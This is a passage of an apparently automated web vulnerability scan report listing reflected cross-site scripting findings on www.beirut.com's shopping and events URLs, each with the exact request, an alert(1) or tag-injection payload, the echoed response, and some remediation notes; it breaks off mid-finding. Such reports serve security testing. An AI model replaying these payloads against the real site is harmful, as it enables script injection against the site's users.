This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping5d47e"><a>acdaeb12181/Stores-Markets/3546182765/Department-Store/68 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:53:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping5d47e"><a>acdaeb12181">
...[SNIP]...

4.1076. http://www.beirut.com/Shopping/Stores-Markets/3546182765/MiniMarket/75 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765/MiniMarket/75

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4072'-alert(1)-'8bf252c2f0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppingb4072'-alert(1)-'8bf252c2f0a/Stores-Markets/3546182765/MiniMarket/75 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:58:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shoppingb4072'-alert(1)-'8bf252c2f0a/Stores-Markets/3546182765/MiniMarket/75';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1077. http://www.beirut.com/Shopping/Stores-Markets/3546182765/MiniMarket/75 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765/MiniMarket/75

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1422d"><a>e29aae621eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping1422d"><a>e29aae621eb/Stores-Markets/3546182765/MiniMarket/75 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:48:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping1422d"><a>e29aae621eb">
...[SNIP]...

4.1078. http://www.beirut.com/Shopping/Stores-Markets/3546182765/MiniMarket/75 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765/MiniMarket/75

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef7af'-alert(1)-'a4c5d786ed4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Stores-Marketsef7af'-alert(1)-'a4c5d786ed4/3546182765/MiniMarket/75 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:04:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Stores-Marketsef7af'-alert(1)-'a4c5d786ed4/3546182765/MiniMarket/75';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1079. http://www.beirut.com/Shopping/Stores-Markets/3546182765/MiniMarket/75 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765/MiniMarket/75

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 77a97<script>alert(1)</script>0c7a555e2b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Stores-Markets77a97<script>alert(1)</script>0c7a555e2b3/3546182765/MiniMarket/75 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:05:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Stores Markets77a97<script>alert(1)</script>0c7a555e2b3 <a href="#" id="backlink">
...[SNIP]...

4.1080. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765/Supermarket/63

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 256b2"><a>67ef445c9a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping256b2"><a>67ef445c9a4/Stores-Markets/3546182765/Supermarket/63 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:38:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping256b2"><a>67ef445c9a4">
...[SNIP]...

4.1081. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765/Supermarket/63

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a90d'-alert(1)-'a542c436cba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping3a90d'-alert(1)-'a542c436cba/Stores-Markets/3546182765/Supermarket/63 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:45:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping3a90d'-alert(1)-'a542c436cba/Stores-Markets/3546182765/Supermarket/63';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1082. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765/Supermarket/63

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53fc3'-alert(1)-'54c431413ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Stores-Markets53fc3'-alert(1)-'54c431413ae/3546182765/Supermarket/63 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:51:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Stores-Markets53fc3'-alert(1)-'54c431413ae/3546182765/Supermarket/63';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1083. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765/Supermarket/63

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 14623<script>alert(1)</script>10ab5659ae6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Stores-Markets14623<script>alert(1)</script>10ab5659ae6/3546182765/Supermarket/63 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:51:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Stores Markets14623<script>alert(1)</script>10ab5659ae6 <a href="#" id="backlink">
...[SNIP]...

4.1084. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765/Supermarket/63

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3352'-alert(1)-'1987268ce2a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Stores-Markets/3546182765b3352'-alert(1)-'1987268ce2a/Supermarket/63 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:56:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Stores-Markets/3546182765b3352'-alert(1)-'1987268ce2a/Supermarket/63';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1085. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765/Supermarket/63

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70285'-alert(1)-'154c5bfcafe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Stores-Markets/3546182765/Supermarket70285'-alert(1)-'154c5bfcafe/63 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:59:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Stores-Markets/3546182765/Supermarket70285'-alert(1)-'154c5bfcafe/63';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1086. http://www.beirut.com/Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53ca1"><a>d32881060f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping53ca1"><a>d32881060f0/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:00:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping53ca1"><a>d32881060f0">
...[SNIP]...

4.1087. http://www.beirut.com/Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97253'-alert(1)-'94cd40893b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping97253'-alert(1)-'94cd40893b6/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:04:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping97253'-alert(1)-'94cd40893b6/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1088. http://www.beirut.com/ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097

Issue detail

